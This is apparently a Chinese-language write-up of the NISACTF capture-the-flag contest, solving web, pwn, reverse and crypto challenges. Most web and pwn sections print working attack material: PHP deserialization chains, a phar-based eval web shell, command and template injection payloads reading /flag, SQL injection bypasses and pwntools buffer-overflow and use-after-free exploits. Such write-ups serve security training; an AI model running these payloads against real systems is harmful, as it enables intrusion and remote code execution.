周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12)
WEB没有AK还是略有遗憾,到后面实在做不动了。
第一次写这么长的WP…

WEB

checkin

 <?php
error_reporting(0);
include "flag.php";
// ‮⁦NISACTF⁩⁦Welcome to
if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!⁩⁦N1SACTF" == $_GET[‮⁦Ugeiwo⁩⁦cuishiyuan]) { //tnnd! weishenme becho $FLAG;
}
show_source(__FILE__);
?>

存在不可见字符,复制到010editer打开。

复制对应的16进制编码构造payload:

http://120.27.195.236:28990/?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6%55%67%65%69%77%6F%E2%81%A9%E2%81%A6%63%75%69%73%68%69%79%75%61%6E=%E2%80%AE%E2%81%A6%20%46%6C%61%67%21%E2%81%A9%E2%81%A6%4E%31%53%41%43%54%46

level-up

扫描发现robots.txt

<?php
//here is level 2
error_reporting(0);
include "str.php";
if (isset($_POST['array1']) && isset($_POST['array2'])){$a1 = (string)$_POST['array1'];$a2 = (string)$_POST['array2'];if ($a1 == $a2){die("????");}if (md5($a1) === md5($a2)){echo $level3;}else{die("level 2 failed ...");}}
else{show_source(__FILE__);
}
?>

md5强碰撞,payload:

POST:
array1=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A3njn%FD%1A%CB%3A%29Wr%02En%CE%89%9A%E3%8EF%F1%BE%E9%EE3%0E%82%2A%95%23%0D%FA%CE%1C%F2%C4P%C2%B7s%0F%C8t%F28%FAU%AD%2C%EB%1D%D8%D2%00%8C%3B%FCN%C9b4%DB%AC%17%A8%BF%3Fh%84i%F4%1E%B5Q%7B%FC%B9RuJ%60%B4%0D7%F9%F9%00%1E%C1%1B%16%C9M%2A%7D%B2%BBoW%02%7D%8F%7F%C0qT%D0%CF%3A%9DFH%F1%25%AC%DF%FA%C4G%27uW%CFNB%E7%EF%B0&array2=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A3njn%FD%1A%CB%3A%29Wr%02En%CE%89%9A%E3%8E%C6%F1%BE%E9%EE3%0E%82%2A%95%23%0D%FA%CE%1C%F2%C4P%C2%B7s%0F%C8t%F28zV%AD%2C%EB%1D%D8%D2%00%8C%3B%FCN%C9%E24%DB%AC%17%A8%BF%3Fh%84i%F4%1E%B5Q%7B%FC%B9RuJ%60%B4%0D%B7%F9%F9%00%1E%C1%1B%16%C9M%2A%7D%B2%BBoW%02%7D%8F%7F%C0qT%D0%CF%3A%1DFH%F1%25%AC%DF%FA%C4G%27uW%CF%CEB%E7%EF%B0


 <?php
//here is level 3
error_reporting(0);
include "str.php";
if (isset($_POST['array1']) && isset($_POST['array2'])){$a1 = (string)$_POST['array1'];$a2 = (string)$_POST['array2'];if ($a1 == $a2){die("????");}if (sha1($a1) === sha1($a2)){echo $level4;}else{die("level 3 failed ...");}}
else{show_source(__FILE__);
}
?>

sha1强碰撞,payload:

POST:
array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1


<?php
//here is last levelerror_reporting(0);include "str.php";show_source(__FILE__);$str = parse_url($_SERVER['REQUEST_URI']);if($str['query'] == ""){echo "give me a parameter";}if(preg_match('/ |_|20|5f|2e|\./',$str['query'])){die("blacklist here");}if($_GET['NI_SA_'] === "txw4ever"){die($level5);}else{die("level 4 failed ...");}

payload:

?NI+SA%5b=txw4ever


<?php
//sorry , here is true last level
//^_^
error_reporting(0);
include "str.php";$a = $_GET['a'];
$b = $_GET['b'];
if(preg_match('/^[a-z0-9_]*$/isD',$a)){show_source(__FILE__);
}
else{$a('',$b);
}

55_5_55.php?a=%5ccreate_function&b=}system("cat /flag");//

bingdundun~

存在文件包含,文件名应该是自动补.php

再加上提示可以传压缩包,基本是构造phar文件上传利用没跑了。

<?php$phar = new Phar("exp.phar"); $phar->startBuffering();$phar->setStub("<?php __HALT_COMPILER(); ?>"); $phar->addFromString("test.php", '<?php eval($_POST[1]);?>'); $phar->stopBuffering();
?>

将生成的phar文件改成.zip后缀上传,进行文件包含。

?bingdundun=phar:///var/www/html/56602cf7e1c9faef25eee090c580f491.zip/test

用蚁剑连

babyserialize

<?php
include "waf.php";
class NISA{public $fun="show_me_flag";public $txw4ever;public function __wakeup(){if($this->fun=="show_me_flag"){hint();}}function __call($from,$val){$this->fun=$val[0];}public function __toString(){echo $this->fun;return " ";}public function __invoke(){checkcheck($this->txw4ever);@eval($this->txw4ever);}
}class TianXiWei{public $ext;public $x;public function __wakeup(){$this->ext->nisa($this->x);}
}class Ilovetxw{public $huang;public $su;public function __call($fun1,$arg){$this->huang->fun=$arg[0];}public function __toString(){$bb = $this->su;return $bb();}
}class four{public $a="TXW4EVER";private $fun='abc';public function __set($name, $value){$this->$name=$value;if ($this->fun = "sixsixsix"){strtolower($this->a);}}
}if(isset($_GET['ser'])){@unserialize($_GET['ser']);
}else{highlight_file(__FILE__);
}//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}//function hint(){
//    echo ".......";
//    die();
//}
?>

EXP

<?php
class NISA{public $fun;public $txw4ever = "\$a='sy';\$b='stem';(\$a.\$b)('cat /f*');";public function __wakeup(){if($this->fun=="show_me_flag"){hint();}}function __call($from,$val){$this->fun=$val[0];}public function __toString(){echo $this->fun;return " ";}public function __invoke(){checkcheck($this->txw4ever);@eval($this->txw4ever);}
}class TianXiWei{public $ext;public $x;public function __wakeup(){$this->ext->nisa($this->x); //Ilovetxw类__call()}
}class Ilovetxw{public $huang;public $su;public function __construct(){$this->su = new NISA();}public function __call($fun1,$arg){$this->huang->fun=$arg[0]; //four类__set()}public function __toString(){$bb = $this->su;return $bb(); //NISA类__invoke()}
}class four{public $a;private $fun='sixsixsix';public function __set($name, $value){$this->$name=$value;if ($this->fun = "sixsixsix"){strtolower($this->a);}}
}//TianXiWei::__wakeup->Ilovetxw::__call->four_::set()-> Ilovetxw::__toString->NISA::__invoke$ilovetxw1 = new Ilovetxw();
$ilovetxw1->su = new NISA();$four = new four();
$four->a = $ilovetxw1;$ilovetxw2 = new Ilovetxw();
$ilovetxw2->huang = $four;$tianxiwei = new TianXiWei();
$tianxiwei->ext = $ilovetxw2;// echo serialize($tianxiwei);
echo urlencode(serialize($tianxiwei));?>

O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BN%3Bs%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3BN%3Bs%3A8%3A%22txw4ever%22%3Bs%3A37%3A%22%24a%3D%27sy%27%3B%24b%3D%27stem%27%3B%28%24a.%24b%29%28%27cat+%2Ff%2A%27%29%3B%22%3B%7D%7Ds%3A9%3A%22%00four%00fun%22%3Bs%3A9%3A%22sixsixsix%22%3B%7Ds%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3BN%3Bs%3A8%3A%22txw4ever%22%3Bs%3A37%3A%22%24a%3D%27sy%27%3B%24b%3D%27stem%27%3B%28%24a.%24b%29%28%27cat+%2Ff%2A%27%29%3B%22%3B%7D%7Ds%3A1%3A%22x%22%3BN%3B%7D

babyupload

访问/source下载源代码www.zip

from flask import Flask, request, redirect, g, send_from_directory
import sqlite3
import os
import uuidapp = Flask(__name__)SCHEMA = """CREATE TABLE files (
id text primary key,
path text
);
"""def db():g_db = getattr(g, '_database', None)if g_db is None:g_db = g._database = sqlite3.connect("database.db")return g_db@app.before_first_request
def setup():os.remove("database.db")cur = db().cursor()cur.executescript(SCHEMA)@app.route('/')
def hello_world():return """<!DOCTYPE html>
<html>
<body>
<form action="/upload" method="post" enctype="multipart/form-data">Select image to upload:<input type="file" name="file"><input type="submit" value="Upload File" name="submit">
</form>
<!-- /source -->
</body>
</html>"""@app.route('/source')
def source():return send_from_directory(directory="/var/www/html/", path="www.zip", as_attachment=True)@app.route('/upload', methods=['POST'])
def upload():if 'file' not in request.files:return redirect('/')file = request.files['file']if "." in file.filename:return "Bad filename!", 403conn = db()cur = conn.cursor()uid = uuid.uuid4().hextry:cur.execute("insert into files (id, path) values (?, ?)", (uid, file.filename,))except sqlite3.IntegrityError:return "Duplicate file"conn.commit()file.save('uploads/' + file.filename)return redirect('/file/' + uid)@app.route('/file/<id>')
def file(id):conn = db()cur = conn.cursor()cur.execute("select path from files where id=?", (id,))res = cur.fetchone()if res is None:return "File not found", 404# print(res[0])with open(os.path.join("uploads/", res[0]), "r") as f:return f.read()if __name__ == '__main__':app.run(host='0.0.0.0', port=80)

此处有漏洞

    with open(os.path.join("uploads/", res[0]), "r") as f:return f.read()

构造恶意文件名为//flag

easyssrf

<?phphighlight_file(__FILE__);
error_reporting(0);$file = $_GET["file"];
if (stristr($file, "file")){die("你败了.");
}//flag in /flag
echo file_get_contents($file);

简单的LFIha1x1ux1u.php?file=php://filter/convert.base64-encode/resource=/flag

in secret

是个原题,没啥好说的,指路 -> [CISCN2019_华东南赛区]Double_Secret

EXP

# -*- coding: utf-8 -*-
import urllib.parse
import base64
import requests
from html import unescapedef init_box(key):"""S盒"""s_box = list(range(256)) j = 0for i in range(256):j = (j + s_box[i] + ord(key[i % len(key)])) % 256s_box[i], s_box[j] = s_box[j], s_box[i]return s_boxdef ex_encrypt(plain, box, mode):"""利用PRGA生成秘钥流并与密文字节异或,加解密同一个算法"""if mode == '2':while True:c_mode = input("输入你的解密模式:Base64 or ordinary\n")if c_mode == 'Base64':plain = base64.b64decode(plain)plain = bytes.decode(plain)breakelif c_mode == 'ordinary':plain = plainbreakelse:print("Something Wrong,请重新新输入")continueres = []i = j = 0for s in plain:i = (i + 1) % 256j = (j + box[i]) % 256box[i], box[j] = box[j], box[i]t = (box[i] + box[j]) % 256k = box[t]res.append(chr(ord(s) ^ k))cipher = "".join(res)if mode == 1:return urllib.parse.quote(cipher)if mode == 2:print("解密后的密文:")print(cipher)return cipherdef Rc4_encrypt(message, key):box = init_box(key)return ex_encrypt(message, box, 1)def Rc4_decrypt(message, key):box = init_box(key)return ex_encrypt(message, box, 2)if __name__ == '__main__':url = 'http://124.221.24.137:28296/'payload = "{{ config.__class__.__init__.__globals__['os'].popen('cat /flag.txt').read() }}"key = 'HereIsTreasure'res = requests.get(url + 'secret?secret=' + Rc4_encrypt(payload, key))print(unescape(res.text))

popchains

<?phpecho 'Happy New Year~ MAKE A WISH<br>';if(isset($_GET['wish'])){@unserialize($_GET['wish']);
}
else{$a=new Road_is_Long;highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/class Road_is_Long{public $page;public $string;public function __construct($file='index.php'){$this->page = $file;}public function __toString(){return $this->string->page;}public function __wakeup(){if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {echo "You can Not Enter 2022";$this->page = "index.php";}}
}class Try_Work_Hard{protected  $var;public function append($value){include($value);}public function __invoke(){$this->append($this->var);}
}class Make_a_Change{public $effort;public function __construct(){$this->effort = array();}public function __get($key){$function = $this->effort;return $function();}
}
/**********************Try to See flag.php*****************************/

EXP

<?phpclass Road_is_Long{public $page;public $string;public function __construct($file='index.php'){$this->page = $file;}public function __toString(){return $this->string->page;}public function __wakeup(){if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {echo "You can Not Enter 2022";$this->page = "index.php";}}
}class Try_Work_Hard{protected $var = '/flag';public function append($value){include($value);}public function __invoke(){$this->append($this->var);}
}class Make_a_Change{public $effort;public function __get($key){$function = $this->effort;return $function();}
}$mac = new Make_a_Change();
$mac->effort = new Try_Work_Hard();$ril1 = new Road_is_Long();
$ril1->string = $mac;$ril2 = new Road_is_Long();
$ril2->page = $ril1;echo urlencode(serialize($ril2));

O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Bs%3A9%3A%22index.php%22%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BN%3B%7D

middlerce

<?php
include "check.php";
if (isset($_REQUEST['letter'])){$txw4ever = $_REQUEST['letter'];if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw4ever)){die("再加把油喔");}else{$command = json_decode($txw4ever,true)['cmd'];checkdata($command);@eval($command);}
}
else{highlight_file(__FILE__);
}
?>

正则有个m%0a大法就用不上了,那就用正则回溯绕过。

绕过了很多东西,连括号都没放过。于是直接``执行代码,把输出结果定向到文件。

绕正则很简单,这里试了好久 5555555

EXP

import requests
payload = '{"cmd":"`nl /f*>1`;","test":"' + "@"*(1000000) + '"}'
res = requests.post("http://124.221.24.137:28819/", data={"letter":payload})
print(res.text)

join us

报错注入,把dl.php整个弄下来,一段一段慢慢mid吧。

<?php
error_reporting(0);
session_start();
include_once "config.php";
global $MysqlLink;
$MysqlLink = mysqli_connect("127.0.0.1",$datauser,$datapass);
if(!$MysqlLink) {die("Mysql Connect Error!");
}
$selectDB = mysqli_select_db($MysqlLink,$dataName);
if(!$selectDB) {die("Choose Database Error!");
}
if(isset($_POST['tt'])) {$txw4ever = $_POST['tt'];$blacklist = "union|left|right|and|or|by|if|\&|sleep|floor|substr|ascii|=|\"|benchmark|as|column|insert|update";if(preg_match("/{$blacklist}/is",$txw4ever)) {die("不要耍小心思喔~");}$sql = "select*from Fal_flag where id = '$txw4ever';";$result = mysqli_query($MysqlLink,$sql);if($result) {$row = mysqli_fetch_array($result);echo "message: ";print_r($row['data']);} else {echo mysqli_error($MysqlLink);}
} else {die("?");
}
?>

看这个代码,长得真像某个堆叠的题目,可惜不是。

看到or被ban了,就知道information也顺带没有了,用mysql.innodb_table_stats绕过。

打印表名,发现有FLAG_TABLE,news,users,gtid_slaave_pos,Fal_flag,output

FLAG_TABLE就是个烟雾弹!!!!其实在output里!!!!

花了很多时间在FLAG_TABLE,浪费了好多时间。

得到字段名data,然后就可以得到flag了。

midlevel

还是个原题,指路 -> [CISCN2019_华东南赛区]Web11

X-Forwarded-For:  {if system("ls  /")}{/if}  {if system("cat /flag")}{/if}

PWN

ReorPwn

输入的命令反一下就好了,无他。

ezpie

from pwn import *context.log_level = 'debug'# p = process("./ezpie")
p = remote('124.221.24.137', 28665)p.recvuntil('0x')
main_addr = int(p.recv(8), 16)
print('[+]main_addr: ', hex(main_addr))
shell_addr = main_addr + 0x80F - 0x770
print('[+]shell_addr: ', hex(shell_addr))
payload = b'a'*(0x28 + 4) + p32(shell_addr)p.recvuntil("Input:\n")
p.sendline(payload)
p.interactive()

ezstack

from pwn import *context.log_level = 'debug'# p = process("./ezstack")
p = remote('124.221.24.137', 28980)
elf = ELF('./ezstack')
bin_sh = 0x0804A024sys_addr = elf.symbols['system'] payload = b"A"*(0x48 + 4) + p32(sys_addr) + p32(0xdeadbeef) + p32(bin_sh)p.sendlineafter("Welcome to NISACTF\n",payload)
p.interactive()

ezheap

实际上是个堆题,也不是个堆题,代码都不用写:

UAF

# -*- coding: utf-8 -*-
from pwn import *context.log_level = 'debug'p = process('./UAF')
# p = remote('',)def add_note():p.recvuntil(":")p.sendline("1")def edit_note(page, content):p.recvuntil(":")p.sendline("2")p.recvuntil("Input page\n")p.sendline(str(page))p.recvuntil("Input your strings\n")p.sendline(content)def del_note(page):p.recvuntil(":")p.sendline("3")p.recvuntil("Input page\n")p.sendline(str(page))def show_note(page):p.recvuntil(":")p.sendline("3")p.recvuntil("Input page\n")p.sendline(str(page))system_addr = 0x08048642
add_note()
del_note(0)
add_note()
payload = 'sh;\x00' +p32(system_addr)
edit_note(1, payload)
show_note(0)p.interactive()

Reverse

ezpython

pyinstxtractor反编译,然后用010editerstruct.pyc的头换给src.pyc

uncompyle6还原成py文件。

# uncompyle6 version 3.7.4
# Python bytecode 3.4 (3310)
# Decompiled from: Python 3.8.10 (default, Jun  2 2021, 10:49:15)
# [GCC 9.4.0]
# Embedded file name: src.py
# Compiled at: 1995-09-28 00:18:56
# Size of source mod 2**32: 272 bytes
import rsa, base64
key1 = rsa.PrivateKey.load_pkcs1(base64.b64decode('LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcVFJQkFBS0NBUUVBcVJUZ0xQU3BuT0ZDQnJvNHR1K1FBWXFhTjI2Uk42TzY1bjBjUURGRy9vQ1NJSU00ClNBeEVWaytiZHpSN2FucVNtZ1l5MEhRWGhDZTM2U2VGZTF0ejlrd0taL3UzRUpvYzVBSzR1NXZ4UW5QOWY1cTYKYVFsbVAvVjJJTXB5NFFRNlBjbUVoNEtkNm81ZWRJUlB2SHd6V0dWS09OQ3BpL0taQ082V0tWYkpXcWh3WGpEQgpsSDFNVURzZ1gyVUM4b3Bodnk5dXIyek9kTlBocElJZHdIc1o5b0ZaWWtaMUx5Q0lRRXRZRmlKam1GUzJFQ1RVCkNvcU9acnQxaU5jNXVhZnFvZlB4eHlPb2wwYVVoVGhiaHE4cEpXL3FPSFdYd0xJbXdtNk96YXFVeks4NEYyY3UKYWRiRE5zeVNvaElHaHYzd0lBVThNSlFnOEthd1Z3ZHBzRWhlSXdJREFRQUJBb0lCQURBazdwUStjbEZtWHF1Vgp1UEoyRWxZdUJpMkVnVHNMbHZ0c1ltL3cyQnM5dHQ0bEh4QjgxYlNSNUYyMEJ2UlJ4STZ3OXlVZCtWZzdDd1lMCnA5bHhOL3JJdWluVHBkUEhYalNhaGNsOTVOdWNOWEZ4T0dVU05SZy9KNHk4dUt0VHpkV3NITjJORnJRa0o4Y2IKcWF5czNOM3RzWTJ0OUtrUndjbUJGUHNJalNNQzB5UkpQVEE4cmNqOFkranV3SHZjbUJPNHVFWXZXeXh0VHR2UQova0RQelBqdTBuakhkR055RytkSDdkeHVEV2Jxb3VZQnRMdzllZGxXdmIydTJ5YnZzTXl0NWZTOWF1a01NUjNoCnBhaDRMcU1LbC9ETTU3cE44Vms0ZTU3WE1zZUJLWm1hcEptcVNnSGdjajRPNWE2R1RvelN1TEVoTmVGY0l2Tm8KWFczTEFHRUNnWWtBc0J0WDNVcFQ3aUcveE5BZDdSWER2MENOY1k1QnNZOGY4NHQ3dGx0U2pjSWdBKy9nUjFMZQpzb2gxY1RRd1RadUYyRTJXL1hHU3orQmJDTVVySHNGWmh1bXV6aTBkbElNV3ZhU0dvSlV1OGpNODBlUjRiVTRyCmdYQnlLZVZqelkzNVlLejQ5TEVBcFRQcTZRYTVQbzhRYkF6czhuVjZtNXhOQkNPc0pQQ29zMGtCclFQaGo5M0cKOFFKNUFQWEpva0UrMmY3NXZlazZNMDdsaGlEUXR6LzRPYWRaZ1MvUVF0eWRLUmg2V3VEeGp3MytXeXc5ZjNUcAp5OXc0RmtLRzhqNVRpd1RzRmdzem94TGo5TmpSUWpqb3cyVFJGLzk3b2NxMGNwY1orMUtsZTI1cEJ3bk9yRDJBCkVpMUVkMGVEV3dJR2gzaFhGRmlRSzhTOG5remZkNGFMa1ZxK1V3S0JpRXRMSllIamFZY0N2dTd5M0JpbG1ZK0gKbGZIYkZKTkowaXRhazRZZi9XZkdlOUd6R1h6bEhYblBoZ2JrZlZKeEVBU3ZCOE5NYjZ5WkM5THdHY09JZnpLRApiczJQMUhuT29rWnF0WFNxMCt1UnBJdEkxNFJFUzYySDJnZTNuN2dlMzJSS0VCYnVKb3g3YWhBL1k2d3ZscUhiCjFPTEUvNnJRWk0xRVF6RjRBMmpENmdlREJVbHhWTUVDZVFDQjcyUmRoYktNL3M0TSsvMmYyZXI4Y2hwT01SV1oKaU5Hb3l6cHRrby9sSnRuZ1RSTkpYSXdxYVNCMldCcXpndHNSdEhGZnpaNlNyWlJCdTd5Y0FmS3dwSCtUd2tsNQpoS2hoSWFTNG1vaHhwUVNkL21td1JzbTN2NUNDdXEvaFNtNmNXYTdFOVZxc25heGQzV21tQ2VqTnp0MUxQWUZNCkxZMENnWWdKUHhpVTVraGs5cHB6TVAwdWU0clA0Z2YvTENldEdmQjlXMkIyQU03eW9VM2VsMWlCSEJqOEZ3UFQKQUhKUWtCeTNYZEh3SUpGTUV1RUZSSFFzcUFkSTlYVDBzL2V0QTg1Y3grQjhjUmt3bnFHakFseW1PdmJNOVNrMgptMnRwRi8rYm56ZVhNdFA3c0ZoR3NHOXJ5SEZ6UFNLY3NDSDhXWWx0Y1pTSlNDZHRTK21qblAwelArSjMKLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZLS0tLS0K'))
key2 = rsa.PublicKey.load_pkcs1(base64.b64decode('LS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JSUJDZ0tDQVFFQXFSVGdMUFNwbk9GQ0JybzR0dStRQVlxYU4yNlJONk82NW4wY1FERkcvb0NTSUlNNFNBeEUKVmsrYmR6UjdhbnFTbWdZeTBIUVhoQ2UzNlNlRmUxdHo5a3dLWi91M0VKb2M1QUs0dTV2eFFuUDlmNXE2YVFsbQpQL1YySU1weTRRUTZQY21FaDRLZDZvNWVkSVJQdkh3eldHVktPTkNwaS9LWkNPNldLVmJKV3Fod1hqREJsSDFNClVEc2dYMlVDOG9waHZ5OXVyMnpPZE5QaHBJSWR3SHNaOW9GWllrWjFMeUNJUUV0WUZpSmptRlMyRUNUVUNvcU8KWnJ0MWlOYzV1YWZxb2ZQeHh5T29sMGFVaFRoYmhxOHBKVy9xT0hXWHdMSW13bTZPemFxVXpLODRGMmN1YWRiRApOc3lTb2hJR2h2M3dJQVU4TUpRZzhLYXdWd2Rwc0VoZUl3SURBUUFCCi0tLS0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0K'))def encrypt1(message):crypto_text = rsa.encrypt(message.encode(), key2)return crypto_textdef decrypt1(message):message_str = rsa.decrypt(message, key1).decode()return message_strdef encrypt2(tips, key):ltips = len(tips)lkey = len(key)secret = []num = 0for each in tips:if num >= lkey:num = num % lkeysecret.append(chr(ord(each) ^ ord(key[num])))num += 1return base64.b64encode(''.join(secret).encode()).decode()def decrypt2(secret, key):tips = base64.b64decode(secret.encode()).decode()ltips = len(tips)lkey = len(key)secret = []num = 0for each in tips:if num >= lkey:num = num % lkeysecret.append(chr(ord(each) ^ ord(key[num])))num += 1return ''.join(secret)flag = 'IAMrG1EOPkM5NRI1cChQDxEcGDZMURptPzgHJHUiN0ASDgUYUB4LGQMUGAtLCQcJJywcFmddNno/PBtQbiMWNxsGLiFuLwpiFlkyP084Ng0lKj8GUBMXcwEXPTJrRDMdNwMiHVkCBFklHgIAWQwgCz8YQhp6E1xUHgUELxMtSh0xXzxBEisbUyYGOx1DBBZWPg1CXFkvJEcxO0ADeBwzChIOQkdwXQRpQCJHCQsaFE4CIjMDcwswTBw4BS9mLVMLLDs8HVgeQkscGBEBFSpQFQQgPTVRAUpvHyAiV1oPE0kyADpDbF8AbyErBjNkPh9PHiY7O1ZaGBADMB0PEVwdCxI+MCcXARZiPhwfH1IfKitGOF42FV8FTxwqPzBPAVUUOAEKAHEEP2QZGjQVV1oIS0QBJgBDLx1jEAsWKGk5Nw03MVgmWSE4Qy5LEghoHDY+OQ9dXE44Th0='
key = 'this is key'
# try:
#     result = input('please input key: ')
#     if result == decrypt2('AAAAAAAAAAAfFwwRSAIWWQ==', key):
#         print(decrypt1(base64.b64decode(decrypt2(flag, result))))
#     else:
#         if result == key:
#             print('flag{0e26d898-b454-43de-9c87-eb3d122186bc}')
#         else:
#             print('key is error.')
# except Exception as e:
#     pass
# okay decompiling src.pycresult = decrypt2('AAAAAAAAAAAfFwwRSAIWWQ==', key)
print(decrypt1(base64.b64decode(decrypt2(flag, result))))

flag{5236cb7d-f4a7-4080-9bde-8b9e061609ad}

sign-ezc++

# -*- coding: utf-8 -*-
enc =[0x44, 0x59, 0x59, 0x49, 0x5E, 0x4C, 0x71, 0x7E, 0x62, 0x63, 0x79, 0x55, 0x63, 0x79, 0x55, 0x44, 0x43, 0x59, 0x4B, 0x55, 0x78, 0x6F, 0x55, 0x79, 0x63, 0x6D, 0x64, 0x77, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
]flag = ''
for c in enc:flag += chr(c^0xa)print(flag)

NSSCTF{this_is_NISA_re_sign}

string

下个断点远程动调,让程序向下走。

跑出来NSSCTF{535331661112677523}

已知flag 13位就是NSSCTF{5353316611126}

Crypto

sign_crypto

Latex符号 -> Latex常见符号对照表

取得首字母\ni \Sigma \Sigma \chi \Theta \forall { \eta \diamond \infty \tau _ \widehat \int \triangle \hookleftarrow _ \Lambda \aleph \tau \ell \Xi }

NSSCTF{EDIT_WITH_LATEX}

normal

..... ..... ..... ...!? !!.?. ..... ..... ..... ..?.? !.?.. ..... .....
..... ..... !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .....
!.!!! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. ..... !.?.. .....
....! ?!!.? ..... ..... ?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!!
!!!!! !!!?. ?!.?! !!!!! !!!!! .!... ..... .!... ....! .?... ..... .....
!?!!. ?.... ..... ...?. ?!.?. .!.?. ..... ..... !?!!. ?.... ..... .?.?!
.?!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!!
!.!.. ..... ..... .!.?. ..... ..... ..!?! !.?.. ..... ..... ?.?!. ?....
..... ..... ....! .!!!! !!!!! !!!!! !.?.. ..... ....! ?!!.? ..... .....
?.?!. ?!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!!
!!!!! .!... ..... ..... !.... ...!. ?.... ..... ..!?! !.?.. ..... ...?.
?!.?. ..... ..... ..... ....! .?... ..... ...!? !!.?. ..... ....? .?!.?
!.?.. ..... ..... ..... !?!!. ?!!!! !!!!! !!!!! !!?.? !.?!! !!!!! !!!!.
!.... ..... ..!.? ..... ..... ...!? !!.?. ..... ..... .?.?! .?... .....
..... ...!. !!!!! !!!!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?!.?.
..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! .!...
..... ...!. ....! .?... ..... ..... !?!!. ?.... ..... ...?. ?!.?. .!.?.
..... ..... !?!!. ?.... ..... .?.?! .?!.? ..... ..... ..... ..!?! !.?!!
!!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !.!.. ..... ..... .!... !.?.. .....
..... .!?!! .?... ..... ....? .?!.? ..!.? ..... ..... .!?!! .?... .....
